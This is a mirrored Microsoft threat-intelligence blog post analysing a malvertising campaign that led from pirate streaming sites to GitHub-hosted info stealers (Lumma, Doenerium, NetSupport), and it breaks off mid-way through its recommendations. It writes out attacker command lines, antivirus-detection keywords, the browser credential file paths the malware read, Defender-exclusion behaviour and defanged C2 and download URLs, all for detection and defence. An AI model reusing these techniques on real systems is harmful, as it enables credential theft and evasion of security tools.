{"id":58260,"date":"2025-03-06T17:00:00","date_gmt":"2025-03-06T17:00:00","guid":{"rendered":"https:\/\/www.threatshub.org\/blog\/malvertising-campaign-leads-to-info-stealers-hosted-on-github\/"},"modified":"2025-03-06T17:00:00","modified_gmt":"2025-03-06T17:00:00","slug":"malvertising-campaign-leads-to-info-stealers-hosted-on-github","status":"publish","type":"post","link":"https:\/\/www.threatshub.org\/blog\/malvertising-campaign-leads-to-info-stealers-hosted-on-github\/","title":{"rendered":"Malvertising campaign leads to info stealers hosted on GitHub"},"content":{"rendered":"<p>In early December 2024, Microsoft Threat Intelligence detected a large-scale malvertising campaign that impacted nearly one million devices globally in an opportunistic attack to steal information. The attack originated from illegal streaming websites embedded with malvertising redirectors, leading to an intermediary website where the user was then redirected to GitHub and two other platforms. The campaign impacted a wide range of organizations and industries, including both consumer and enterprise devices, highlighting the indiscriminate nature of the attack.<\/p>\n<p>GitHub was the primary platform used in the delivery of the initial access payloads and is referenced throughout this blog post; however, Microsoft Threat Intelligence also observed one payload hosted on Discord and another hosted on Dropbox.<\/p>\n<p>The GitHub repositories, which were taken down, stored malware used to deploy additional malicious files and scripts. Once the initial malware from GitHub gained a foothold on the device, the additional files deployed had a modular and multi-stage approach to payload delivery, execution, and persistence. The files were used to collect system information and to set up further malware and scripts to exfiltrate documents and data from the compromised host. This activity is tracked under the umbrella name Storm-0408 that we use to track numerous threat actors associated with remote access or information-stealing malware and who use phishing, search engine optimization (SEO), or malvertising campaigns to distribute malicious payloads.<\/p>\n<p>In this blog, we provide our analysis of this large-scale malvertising campaign, detailing our findings regarding the redirection chain and various payloads used across the multi-stage attack chain. We further provide recommendations for mitigating the impact of this threat, detection details, indicators of compromise (IOCs), and hunting guidance to locate related activity. By sharing this research, we aim to raise awareness about the tactics, techniques, and procedures (TTPs) used in this widespread activity so organizations can better prepare and implement effective mitigation strategies to protect their systems and data.<\/p>\n<p>We would like to thank the GitHub security team for their prompt response and collaboration in taking down the malicious repositories.<\/p>\n<h2 class=\"wp-block-heading\" id=\"github-activity-and-redirection-chain\">GitHub activity and redirection chain<\/h2>\n<p>Since at least early December 2024, multiple hosts downloaded first-stage payloads from malicious GitHub repositories. The users were redirected to GitHub through a series of other redirections. Analysis of the redirector chain determined the attack likely originated from illegal streaming websites where users can watch pirated videos. The streaming websites embedded malvertising redirectors within movie frames to generate pay-per-view or pay-per-click revenue from malvertising platforms. These redirectors subsequently routed traffic through one or two additional malicious redirectors, ultimately leading to another website, such as a malware or tech support scam website, which then redirected to GitHub.<\/p>\n<p>Multiple stages of malware were deployed in this campaign, as listed below, and the several different stages of activity that occurred depended on the payload dropped during the second stage.<\/p>\n<ul class=\"wp-block-list\">\n<li>The first-stage payload that was hosted on GitHub served as the dropper for the next stage of payloads.<\/li>\n<li>The second-stage files were used to conduct system discovery and to exfiltrate system information that was Base64-encoded into the URL and sent over HTTP to an IP address. The information collected included data on memory size, graphic details, screen resolution, operating system (OS), and user paths.<\/li>\n<li>Various third-stage payloads were deployed depending on the second-stage payload. In general, the third-stage payload conducted additional malicious activities such as command and control (C2) to download additional files and to exfiltrate data, as well as defense evasion techniques.<\/li>\n<\/ul>\n<p>The full redirect chain was composed of four to five layers. Microsoft researchers determined malvertising redirectors were contained within an <a href=\"https:\/\/developer.mozilla.org\/en-US\/docs\/Web\/HTML\/Element\/iframe\">iframe<\/a> on illegal streaming websites.<\/p>\n<figure class=\"wp-block-image size-full\"><img decoding=\"async\" src=\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-content\/uploads\/2025\/03\/image-2.webp\" alt=\"A screenshot of code from a streaming video website and iframe showing the malvertising redirector URL\" class=\"wp-image-137799 webp-format\" srcset data-orig-src=\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-content\/uploads\/2025\/03\/image-2.webp\"><figcaption class=\"wp-element-caption\"><em>Figure 1. Code from website of streaming video and iframe showing malvertising redirector URL<\/em><\/figcaption><\/figure>\n<p>There were several redirections that occurred before arriving at the malicious content stored on GitHub.<\/p>\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"935\" height=\"211\" src=\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-content\/uploads\/2025\/03\/image.jpg\" alt=\"A diagram of the redirection chain first depicting the illegal streaming website with iframe followed by the malicious redirector and counter, which redirects to the malvertising distributor, which finally lands on the malicious content hosted on GitHub.\" class=\"wp-image-137795\" srcset=\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-content\/uploads\/2025\/03\/image.jpg 935w, https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-content\/uploads\/2025\/03\/image-300x68.jpg 300w, https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-content\/uploads\/2025\/03\/image-768x173.jpg 768w\" sizes=\"auto, (max-width: 935px) 100vw, 935px\"><figcaption class=\"wp-element-caption\"><em>Figure 2. Redirection chain from pirate streaming website to malware files on GitHub<\/em><\/figcaption><\/figure>\n<h2 class=\"wp-block-heading\" id=\"attack-chain\">Attack chain<\/h2>\n<p>Once the redirection to GitHub occurred, the malware hosted on GitHub established the initial foothold on the user\u2019s device and functioned as a dropper for additional payload stages and running malicious code. The additional payloads included information stealers to collect system and browser information on the compromised device, of which most were either Lumma stealer or an updated version of <a href=\"https:\/\/github.com\/antivirusevasion69\/doenerium\">Doenerium<\/a>. Depending on the initial payload, the deployment of NetSupport, a remote monitoring and management (RMM) software, was also often deployed alongside the infostealer. Besides the information stealers, PowerShell, JavaScript, VBScript, and AutoIT scripts were run on the host. The threat actors incorporated use of living-off-the-land binaries and scripts (LOLBAS) like <em>PowerShell.exe<\/em>, <a href=\"https:\/\/learn.microsoft.com\/visualstudio\/msbuild\/msbuild-reference\"><em>MSBuild.exe<\/em><\/a><em>,<\/em> and <em>RegAsm.exe<\/em> for C2 and data exfiltration of user data and browser credentials.<\/p>\n<p>After the initial foothold was gained, the activity led to a modular and multi-stage approach to payload delivery, execution, and persistence. Each stage dropped another payload with a different function, as outlined below. Actions conducted across these stages include system discovery (memory, GPU, OS, signed-in users, and others), opening browser credential files, Data Protection API (DPAPI) crypt data calls, and other functions such as obfuscated script execution and named pipe creations to conduct data exfiltration. Persistence was achieved through modification of the registry run keys and the addition of a shortcut file to the Windows <em>Startup<\/em> folder.<\/p>\n<p>Several stages of malicious activity to conduct deployment of additional malware, collections, and exfiltration of data to a C2 were observed. While not every single initial payload followed these exact steps, this is an overall view of what occurred across most incidents analyzed:<\/p>\n<figure class=\"wp-block-image size-full\"><img decoding=\"async\" src=\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-content\/uploads\/2025\/03\/General-depiction-of-the-four-stages-diagram.webp\" alt=\"A diagram generally displaying the four stages. The first stage involves the malvertising website redirecting users to GitHub pages, leading to a payload downloading from the repo. In the second stage, the payload performs system discovery and exfiltrates collected system information and stage-two payloads drop additional payloads. In the third stage, if the payload is a PowerShell script, it downloads NetSupport RAT from C2, sets persistence, and it may deliver a Lumma Stealer payload using MSBuild.exe for exfiltration. If the third stage payload is an .exe, it creates and runs a .cmd file and drops renamed AutoIT interpreter with a .com file extension, leading to the fourth stage. In the final stage, AutoIT launches binary and may drop an AutoIT interpreter with .scr file extensions, where a JavaScript file is dropped for running and persistence of those files. Finally, the AutoIT payload uses RegAsm.exe or PowerShell.exe to open files, enable browser remote debugging, and exfiltrate data. PowerShell may be deployed to set exclusion paths for Defender and\/or drop NetSupport.\" class=\"wp-image-137800 webp-format\" srcset data-orig-src=\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-content\/uploads\/2025\/03\/General-depiction-of-the-four-stages-diagram.webp\"><figcaption class=\"wp-element-caption\"><em>Figure 3. General depiction of the four stages<\/em><\/figcaption><\/figure>\n<p>During the first stage, a payload is dropped onto the user\u2019s device from the binary hosted on GitHub, establishing a foothold on that device. As of mid-January 2025, the first-stage payloads discovered were digitally signed with a newly created certificate. A total of twelve different certificates were identified, all of which have been revoked.<\/p>\n<p>Most of these initial payloads dropped the following legitimate files to leverage their functionality. These files were either leveraged by the first-stage payload or by later-stage payloads, depending on the actions being conducted.<\/p>\n<figure class=\"wp-block-table table\">\n<table class=\"has-fixed-layout\">\n<tbody readability=\"24.5\">\n<tr>\n<td><strong>File name<\/strong><\/td>\n<td><strong>Function<\/strong><\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>app-64.7z<\/em><\/td>\n<td>This is a compressed archive that stores the second-stage payload and additional dropped files.<\/td>\n<\/tr>\n<tr readability=\"3\">\n<td><em>app.asar<\/em><\/td>\n<td>This is an archive file specific to Electron applications, which are directly installed programs.<\/td>\n<\/tr>\n<tr readability=\"4\">\n<td><em>d3dcompiler_47.dll<\/em><\/td>\n<td>This file is often included in DirectX redistributables, which are commonly bundled with Microsoft installers for games and graphics applications.<\/td>\n<\/tr>\n<tr readability=\"4\">\n<td><em>elevate.exe<\/em><\/td>\n<td>This file is used by various installers and scripts to run processes with elevated privileges, not specific to Microsoft.<\/td>\n<\/tr>\n<tr readability=\"6\">\n<td><em>ffmpeg.dll<\/em><\/td>\n<td>This file is associated with FFmpeg, a popular multimedia framework used to handle video, audio, and other multimedia files and streams.<\/td>\n<\/tr>\n<tr readability=\"5\">\n<td><em>libEGL.dll<\/em><\/td>\n<td>This file is part of the ANGLE project, which is often found in applications that use OpenGL Embedded Systems (ES), including some web browsers and games.<\/td>\n<\/tr>\n<tr readability=\"5\">\n<td><em>libEGLESv2.dll<\/em><\/td>\n<td>This file is part of the ANGLE project, which is often found in applications that use OpenGL ES, including some web browsers and games.<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>LICENSES.chromium.html<\/em><\/td>\n<td>This file could contain information about the system or browser.<\/td>\n<\/tr>\n<tr readability=\"4\">\n<td><em>nsis7z.dll<\/em><\/td>\n<td>This file is associated with the plugins for the Nullsoft Scriptable Install System (NSIS), which is used to create installers for various software.<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>StdUtils.dll<\/em><\/td>\n<td>This file is associated with the plugins for the NSIS.<\/td>\n<\/tr>\n<tr readability=\"4\">\n<td><em>System.dll<\/em><\/td>\n<td>This file is part of the .NET Framework assembly, typically included in Microsoft installers for applications that rely on the .NET Framework.<\/td>\n<\/tr>\n<tr readability=\"4\">\n<td><em>vk_swiftshader.dll<\/em><\/td>\n<td>This file is associated with SwiftShader, which is used in applications that need a CPU-based implementation of the Vulkan API.<\/td>\n<\/tr>\n<tr readability=\"4\">\n<td><em>vulkan-1.dll<\/em><\/td>\n<td>This file is associated with applications that use the Vulkan Graphics API, such as games and graphics software.<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/figure>\n<p>Depending on the first-stage payload that was initially established on the compromised device, Microsoft observed different second-stage payloads and several different methods for delivering these payloads to the device.<\/p>\n<h3 class=\"wp-block-heading\" id=\"second-stage-payload-system-discovery-collection-and-exfiltration\">Second-stage payload: System discovery, collection, and exfiltration<\/h3>\n<p>The main purpose of the second-stage payload is to conduct system discovery and collect that data for exfiltration to the C2. The system information collected includes data such as memory size, graphic card details, screen resolution, operating system, user paths, and a reference to the second-stage payload\u2019s file name.<\/p>\n<p>This was accomplished by querying the registry key <em>HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\ProductName<\/em> for the Windows OS version and running commands, such as the <a href=\"https:\/\/learn.microsoft.com\/windows-server\/administration\/windows-commands\/echo\"><em>echo<\/em><\/a> command, to gather the device\u2019s name (<em>%COMPUTERNAME%)<\/em> and domain name (<em>%USERDOMAIN%).<\/em><\/p>\n<p>System data collected by the second-stage payload is Base64-encoded and exfiltrated as a query parameter to an IP address.<\/p>\n<figure class=\"wp-block-image size-full\"><img decoding=\"async\" src=\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-content\/uploads\/2025\/03\/image.webp\" alt=\"Screenshot of code depicting the typical format of the URL observed when exfiltrating information collected from the compromised device. \" class=\"wp-image-137794 webp-format\" srcset data-orig-src=\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-content\/uploads\/2025\/03\/image.webp\"><figcaption class=\"wp-element-caption\"><em>Figure 4. Typical format of the URL observed when exfiltrating information collected from the compromised device<\/em><\/figcaption><\/figure>\n<h3 class=\"wp-block-heading\" id=\"third-stage-payload-powershell-and-exe-binary\">Third-stage payload: PowerShell and <em>.exe<\/em> binary<\/h3>\n<p>Depending on the second-stage payload, either one or multiple executables are dropped onto the compromised device, and sometimes an accompanying encoded PowerShell script. These files initiate a chain of events that conduct command execution, payload delivery, defensive evasion, persistence, C2 communications, and data exfiltration. The analysis of the dropped executables is first discussed below, followed by review of the PowerShell scripts observed.<\/p>\n<h4 class=\"wp-block-heading\" id=\"third-stage-exe-analysis\">Third-stage .exe analysis<\/h4>\n<p>The second-stage payloads run the dropped third-stage executables using the command prompt (for example, <em>cmd.exe&nbsp; \/d \/s \/c \u201c\u201dC:\\Users\\&lt;user&gt;\\AppData\\Local\\Temp\\ApproachAllan.exe\u201d\u201d<\/em>). The<em> \/c <\/em>flag ensures that the command runs and exits quickly. When the third-stage <em>.exe<\/em> runs, it drops a command file (.<em>cmd<\/em>) and launches it using the command prompt (for example, \u201c<em>cmd.exe\u201d \/c copy Beauty Beauty.cmd &amp;&amp; Beauty.cmd<\/em>). The <em>.cmd<\/em> file performs several actions, such as running <em>tasklist<\/em>, to initiate the discovery of running programs. This is followed by the <em>findstr<\/em> to search for keywords associated with security software:<\/p>\n<figure class=\"wp-block-table table\">\n<table class=\"has-fixed-layout\">\n<tbody>\n<tr>\n<td><strong><em>findstr<\/em> keyword<\/strong><\/td>\n<td><strong>Associated software<\/strong><\/td>\n<\/tr>\n<tr>\n<td>wrsa<\/td>\n<td>Webroot SecureAnywhere<\/td>\n<\/tr>\n<tr>\n<td>opssvc<\/td>\n<td>Quick Heal<\/td>\n<\/tr>\n<tr>\n<td>AvastUI<\/td>\n<td>Avast Antivirus<\/td>\n<\/tr>\n<tr>\n<td>AVGUI<\/td>\n<td>AVG Antivirus<\/td>\n<\/tr>\n<tr>\n<td>bdservicehost<\/td>\n<td>Bitdefender Antivirus<\/td>\n<\/tr>\n<tr>\n<td>nsWscSvc<\/td>\n<td>Norton Security<\/td>\n<\/tr>\n<tr>\n<td>ekrn<\/td>\n<td>ESET<\/td>\n<\/tr>\n<tr>\n<td>SophosHealth<\/td>\n<td>Sophos<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/figure>\n<p>The <em>.cmd<\/em> file also concatenates multiple files into one with a single character file name: <em>\u201ccmd \/c copy \/b ..\\Verzeichnis + ..\\Controlling + ..\\Constitute + ..\\Enjoyed + ..\\Confusion + ..\\Min +..\\Statutory J\u201d<\/em>. This single character filename is used next.<\/p>\n<p>Following this, the third-stage <em>.exe<\/em> produces an AutoIT v3 interpreter file that is renamed from the typical file name of <em>AutoIt3.exe<\/em> and uses a <em>.com<\/em> file extension. The <em>.cmd<\/em> file initiates the execution of the<em> .com<\/em> file against the single character binary (such as <em>Briefly.com J<\/em>). Note, most of the second-stage payloads follow this progression chain, and as mentioned a second-stage payload can also drop multiple executables, all following the same process. For example:<\/p>\n<p><strong>First stage<\/strong><\/p>\n<ul class=\"wp-block-list\">\n<li><em>X-essentiApp.exe<\/em><\/li>\n<\/ul>\n<p><strong>Second stage<\/strong><\/p>\n<ul class=\"wp-block-list\">\n<li><em>Ionixnignx.exe<\/em><\/li>\n<\/ul>\n<p><strong>Third stage<\/strong><\/p>\n<ul class=\"wp-block-list\">\n<li><em>EverybodyViewing.exe<\/em><\/li>\n<li><em>ReliefOrganizational.exe<\/em><\/li>\n<li><em>InflationWinston.exe<\/em><\/li>\n<\/ul>\n<p><strong>Third-stage command files<\/strong><\/p>\n<ul class=\"wp-block-list\">\n<li><em>Beauty.cmd<\/em><\/li>\n<li><em>Possess.cmd<\/em><\/li>\n<li><em>Villa.cmd<\/em><\/li>\n<\/ul>\n<p><strong>Fourth-stage AutoIT <em>.com<\/em> files<\/strong><\/p>\n<ul class=\"wp-block-list\">\n<li><em>Alexandria.com<\/em><\/li>\n<li><em>Kills.com<\/em><\/li>\n<li><em>Briefly.com<\/em><\/li>\n<\/ul>\n<p>We observed multiple <em>.com<\/em> files originating from different dropped executables, each performing distinct functions while occasionally overlapping in behavior. These files facilitate persistence, process injection, remote debugging, and data exfiltration through various mechanisms. One <em>.com<\/em> file, such as <em>Alexandria.com<\/em>, drops a <em>.scr<\/em> file (another renamed AutoIT interpreter), and a<em> .js<\/em> (JavaScript) file with the same name as the <em>.scr <\/em>file. The purpose of the JavaScript file is to ensure persistence by creating a <em>.url <\/em>internet shortcut that points to the JavaScript file and is placed in the <em>Startup<\/em> folder, ensuring that the <em>.scr <\/em>file executes when the <em>.js<\/em> file executes (through <em>Wscript.exe<\/em>) upon user sign-in. Alternatively, persistence can be achieved using scheduled task creation. The <em>.scr <\/em>file can initiate C2 connections, enable remote debugging on Chrome or Edge within a hidden desktop session, or create TCP listening sockets on ports 9220-9229. This functionality allows threat actors to monitor browsing activity and interact with an active browser instance. These files can also open sensitive data files, indicating their role in facilitating post-exploitation activities.<\/p>\n<p>Another <em>.<\/em><em>com<\/em> file, such as <em>affiliated.com<\/em>, also focuses on remote debugging and browser monitoring. In addition to remote monitoring, <em>affiliated.com<\/em> initiates network connections to Telegram, Let\u2019s Encrypt, and threat actor domains, potentially for C2 or exfiltration. It also accesses DPAPI to decrypt sensitive stored credentials and retrieve browser data.<\/p>\n<p>The final observed <em>.<\/em><em>com<\/em> file, such as <em>Briefly.com<\/em>, exhibits behavior similar to <em>affiliated.com<\/em> but extends its capabilities to include screenshot capture, data exfiltration, and PowerShell-based execution. This file accesses browser and user data for collection, establishes connections to Pastebin and additional C2 domains, and drops the fourth-stage PowerShell script.<\/p>\n<p>The order in which these <em>.<\/em><em>com<\/em> files run is not strictly defined, as one or multiple files can perform overlapping functions depending on the third-stage payload. In many cases, the <em>.<\/em><em>com<\/em> files also leverage LOLBAS like <em>RegAsm.exe<\/em> by dropping a legitimate file into the <em>%TEMP%<\/em> directory or injecting malicious code into it using <em>NtAllocateVirtualMemory<\/em> and <em>SetThreadContext <\/em>API function calls. <em>RegAsm.exe<\/em> is used to establish C2 connections over TCP ports 15647 or 9000, exfiltrating data, accessing DPAPI for decryption, monitoring keystrokes using the <em>WH_KEYBOARD_LL <\/em>hook, and more. This flexibility in execution allows threat actors to tailor their approach based on environmental factors, such as security configurations and user activity.<\/p>\n<p>Browser data files seen accessed:<\/p>\n<ul class=\"wp-block-list\">\n<li><em>\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\&lt;user profile uid&gt;.default-release\\cookies.sqlite<\/em><\/li>\n<li><em>\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\&lt;user profile uid&gt;.default-release\\formhistory.sqlite<\/em><\/li>\n<li><em>\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\&lt;user profile uid&gt;.default-release\\key4.db<\/em><\/li>\n<li><em>\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\&lt;user profile uid&gt;.default-release\\logins.json<\/em><\/li>\n<li><em>\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Data<\/em><\/li>\n<li><em>\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data<\/em><\/li>\n<li><em>\\AppData\\Local\\Microsoft\\Edge\\User Data\\Default\\Login Data<\/em><\/li>\n<\/ul>\n<p>User data file paths seen accessed:<\/p>\n<ul class=\"wp-block-list\">\n<li><em>C:\\\\Users\\&lt;user&gt;\\\\OneDrive<\/em><\/li>\n<li><em>C:\\\\Users\\&lt;user&gt;\\\\Documents<\/em><\/li>\n<li><em>C:\\\\Users\\&lt;user&gt;\\\\Downloads<\/em><\/li>\n<\/ul>\n<h4 class=\"wp-block-heading\" id=\"third-stage-powershell-analysis\">Third-stage PowerShell analysis<\/h4>\n<p>If a PowerShell script is also dropped by the second-stage payload, it includes Base64-obfuscated commands to conduct actions, such as use <a href=\"https:\/\/techcommunity.microsoft.com\/blog\/containers\/tar-and-curl-come-to-windows\/382409\"><em>curl<\/em><\/a> to download additional files like NetSupport from the C2, create persistence for the NetSupport RAT, and exfiltrate system information to C2 servers. To ensure no errors or the progress meter is displayed on the compromised device, the <em>curl<\/em> command is often used with the <a href=\"https:\/\/curl.se\/docs\/manpage.html#-s\"><em>\u2013silent<\/em><\/a> option when downloading files from the C2. PowerShell is often configured to run without restrictions with the <a href=\"https:\/\/learn.microsoft.com\/powershell\/module\/microsoft.powershell.security\/set-executionpolicy?view=powershell-5.1#-executionpolicy\"><em>-ExecutionPolicy Bypass<\/em><\/a> parameter.<\/p>\n<p>As an example, in some of the incidents, when the second-stage payload runs, a PowerShell script is dropped and executed. The script sends the compromised device\u2019s name to the C2 and downloads NetSupport RAT from the same C2.<\/p>\n<ul class=\"wp-block-list\">\n<li>Second-stage payload: <em>Squarel.exe<\/em><\/li>\n<li>PowerShell script: SHA-256: d70ccae7914fc8c36c9e11b2a7f10bebd7f5696e78d8836554f4990b0f688dbb<\/li>\n<li>C2 domain: <em>keikochio[.]com<\/em><\/li>\n<li>NetSupport RAT: SHA-256: 32a828e2060e92b799829a12e3e87730e9a88ecfa65a4fc4700bdcc57a52d995<\/li>\n<\/ul>\n<p>In another case, a second-stage payload drops a PowerShell script, which connects to <em>hxxps:\/\/ipinfo[.]io<\/em> to gather the compromised device\u2019s external-facing IP address. This information is sent to a Telegram chat, then drops <em>presentationhost.exe <\/em>(a renamed NetSupport binary) and <em>remcmdstub.exe <\/em>(NetSupport Command Manager) into the <em>%TEMP%<\/em> directory. Finally, the PowerShell script establishes persistence for <em>presentationhost.exe<\/em> by adding it to the auto-start extensibility points (ASEP) registry keys. When it runs, the NetSupport RAT connects to the C2 and captures a screenshot of the compromised device\u2019s desktop. It also delivers a Lumma executable that drops a VBScript file with the same name. The VBScript file runs encoded PowerShell to initiate C2 connections and launches <em>MSBuild.exe<\/em> to enable Chrome remote debugging on a hidden desktop. Additionally, <em>presentationhost.exe<\/em> initiates <em>remcmdstub.exe<\/em>, which leverages<em> iScrPaint.exe<\/em> (iTop Screen Recorder) to run <em>MSBuild.exe<\/em> and access browser credential files for exfiltration. The <em>iScrPaint.exe<\/em> file also establishes persistence by placing a .<em>lnk<\/em> shortcut in the Windows <em>Startup<\/em> folder, ensuring it runs on system reboot.<\/p>\n<ul class=\"wp-block-list\">\n<li>Second-stage payload: <em>Application.exe<\/em><\/li>\n<li>PowerShell script: SHA-256: 483796a64f004a684a7bc20c1ddd5c671b41a808bc77634112e1703052666a64<\/li>\n<li>C2: <em>hxxp:<\/em>\/\/<em>5<\/em><em>.10.250[.]240\/fakeurl.htm<\/em><\/li>\n<\/ul>\n<p>The last observed third-stage PowerShell script was dropped by three second-stage payloads. The script sends the compromised device\u2019s name to the C2 server. It then changes the working directory to <em>$env:APPDATA<\/em>, before using <em>Start-BitsTransfer<\/em> to download NetSupport from the C2. To evade detection, it modifies system security settings forcing TLS1.2 for encrypted C2 communication. These files are extracted into a newly created <em>WinLibraryClient <\/em>directory under <em>AppData <\/em>and then are launched. The script establishes persistence for the <em>client32.exe (<\/em>NetSupport RAT<em>)<\/em> by modifying the ASEP registry. <em>Client32.exe<\/em> initiates C2 connections to <em>hxxp:\/\/79.132.128[.]77\/fakeurl.htm<\/em>.<\/p>\n<ul class=\"wp-block-list\">\n<li>Second-stage payloads: <em>SalmonSamurai.exe<\/em>, <em>LakerBaker.exe<\/em>, and <em>DisplayPhotoViewer.exe<\/em><\/li>\n<li>PowerShell script: SHA-256: 670218cfc5c16d06762b6bc74cda4902087d812e72c52d6b9077c4c4164856b6<\/li>\n<li>C2 domain: <em>stocktemplates[.]net<\/em><\/li>\n<\/ul>\n<p>Additionally, one observed execution included registry enumeration of <em>HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\ <\/em>to identify installed applications and security software. It also queries the system\u2019s domain status using Windows Management Instrumentation (WMI) and scans for cryptocurrency wallets, including Ledger Live, Trezor Suite, KeepKey, BCVault, OneKey, and BitBox, indicating potential financial data theft.<\/p>\n<h3 class=\"wp-block-heading\" id=\"fourth-stage-powershell-analysis\">Fourth-stage PowerShell analysis<\/h3>\n<p>Depending on the <em>.com<\/em> file that ran (like <em>Briefly.com<\/em>), the renamed AutoIT file may drop a PowerShell script (SHA-256: <a href=\"https:\/\/www.virustotal.com\/gui\/file\/2a29c9904d1860ea3177da7553c8b1bf1944566e5bc1e71340d9e0ff079f0bd3\">2a29c9904d1860ea3177da7553c8b1bf1944566e5bc1e71340d9e0ff079f0bd3<\/a>). The obfuscated PowerShell code uses the <a href=\"https:\/\/learn.microsoft.com\/powershell\/module\/defender\/add-mppreference\"><em>Add-MpPreference<\/em><\/a> cmdlet to modify Microsoft Defender to add in exclusion paths for Microsoft Defender, so the specified folders are not scanned.<\/p>\n<figure class=\"wp-block-image size-full\"><img decoding=\"async\" src=\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-content\/uploads\/2025\/03\/image-1.webp\" alt=\"Screenshot of code depicting the deobfuscated commands to add exclusion paths to Windows Defender.\" class=\"wp-image-137798 webp-format\" srcset data-orig-src=\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-content\/uploads\/2025\/03\/image-1.webp\"><figcaption class=\"wp-element-caption\"><em>Figure 5. Deobfuscated commands to add exclusion paths to Windows Defender<\/em><\/figcaption><\/figure>\n<p>The script above is sometimes followed by an instance of Base64-encoded PowerShell commands. The PowerShell commands perform the following actions:<\/p>\n<ul class=\"wp-block-list\">\n<li>Sends a web request to <em>hxxps:\/\/360[.]net<\/em> and closes the response.<\/li>\n<li>Sends a web request to <em>hxxps:\/\/baidu[.]com<\/em> and closes the response.<\/li>\n<li>Downloads data from <em>hxxps:\/\/klipcatepiu0[.]shop\/int_clp_sha.txt<\/em> using a web client.<\/li>\n<li>Writes the downloaded data to a memory stream and saves it as a <em>.zip<\/em> file named <em>null.zip<\/em> (SHA-256: f07b8e5622598c228bfc9bff50838a3c4fffd88c436a7ef77e6214a40b0a2bae) in the <em>C:\\Users\\&lt;Username&gt;\\AppData\\Local\\Temp<\/em> directory.<\/li>\n<\/ul>\n<h2 class=\"wp-block-heading\" id=\"recommendations\">Recommendations<\/h2>\n<p>Microsoft recommends the following mitigations to reduce the impact of this threat.<\/p>\n<h3 class=\"wp-block-heading\" id=\"strengthen-microsoft-defender-for-endpoint-configuration\">Strengthen Microsoft Defender for Endpoint configuration<\/h3>\n<ul class=\"wp-block-list\">\n<li>Ensure that <a href=\"https:\/\/learn.microsoft.com\/defender-endpoint\/prevent-changes-to-security-settings-with-tamper-protection#how-do-i-configure-or-manage-tamper-protection\" target=\"_blank\" rel=\"noreferrer noopener\">tamper protection<\/a> is enabled in Microsoft Defender for Endpoint.&nbsp;<\/li>\n<li>Enable <a href=\"https:\/\/learn.microsoft.com\/defender-endpoint\/enable-network-protection\" target=\"_blank\" rel=\"noreferrer noopener\">network protection<\/a> in Microsoft Defender for Endpoint.&nbsp;<\/li>\n<li>Turn on <a href=\"https:\/\/learn.microsoft.com\/defender-endpoint\/web-protection-overview\">web protection<\/a>.<\/li>\n<li>Run <a href=\"https:\/\/learn.microsoft.com\/microsoft-365\/security\/defender-endpoint\/edr-in-block-mode\" target=\"_blank\" rel=\"noreferrer noopener\">endpoint detection and response&nbsp;(EDR) in block mode<\/a>&nbsp;so that Microsoft Defender for Endpoint can block malicious artifacts, even when your non-Microsoft antivirus does not detect the threat or when Microsoft Defender Antivirus is running in passive mode. EDR in block mode works behind the scenes to remediate malicious artifacts that are detected post-breach.&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/li>\n<li>Configure\u202f<a href=\"https:\/\/learn.microsoft.com\/microsoft-365\/security\/defender-endpoint\/automated-investigations\" target=\"_blank\" rel=\"noreferrer noopener\">investigation and remediation<\/a>\u202fin full automated mode to let Microsoft Defender for Endpoint take immediate action on alerts to resolve breaches, significantly reducing alert volume.\u202f&nbsp;<\/li>\n<li>Microsoft Defender XDR customers can turn on the following&nbsp;<a href=\"https:\/\/learn.microsoft.com\/microsoft-365\/security\/defender-endpoint\/attack-surface-reduction\" target=\"_blank\" rel=\"noreferrer noopener\">attack surface reduction rules<\/a>&nbsp;to prevent common attack techniques used by threat actors.&nbsp;\n<ul>\n<li><a href=\"https:\/\/learn.microsoft.com\/defender-endpoint\/attack-surface-reduction-rules-reference#block-executable-files-from-running-unless-they-meet-a-prevalence-age-or-trusted-list-criterion\" target=\"_blank\" rel=\"noreferrer noopener\">Block<\/a> executable files from running unless they meet a prevalence, age, or trusted list criterion&nbsp;<\/li>\n<\/ul>\n<ul>\n<li><a href=\"https:\/\/learn.microsoft.com\/defender-endpoint\/attack-surface-reduction-rules-reference#block-execution-of-potentially-obfuscated-scripts\">Block<\/a> execution of potentially obfuscated scripts<\/li>\n<\/ul>\n<ul>\n<li><a href=\"https:\/\/learn.microsoft.com\/microsoft-365\/security\/defender-endpoint\/attack-surface-reduction-rules-reference#block-javascript-or-vbscript-from-launching-downloaded-executable-content\">Block<\/a> JavaScript or VBScript from launching downloaded executable content<\/li>\n<\/ul>\n<ul>\n<li><a href=\"https:\/\/learn.microsoft.com\/defender-endpoint\/attack-surface-reduction-rules-reference#block-process-creations-originating-from-psexec-and-wmi-commands\">Block<\/a> process creations originating from PSExec and WMI commands<\/li>\n<\/ul>\n<ul>\n<li><a href=\"https:\/\/learn.microsoft.com\/defender-endpoint\/attack-surface-reduction-rules-reference#block-credential-stealing-from-the-windows-local-security-authority-subsystem\" target=\"_blank\" rel=\"noreferrer noopener\">Block<\/a> credential stealing from the Windows local security authority 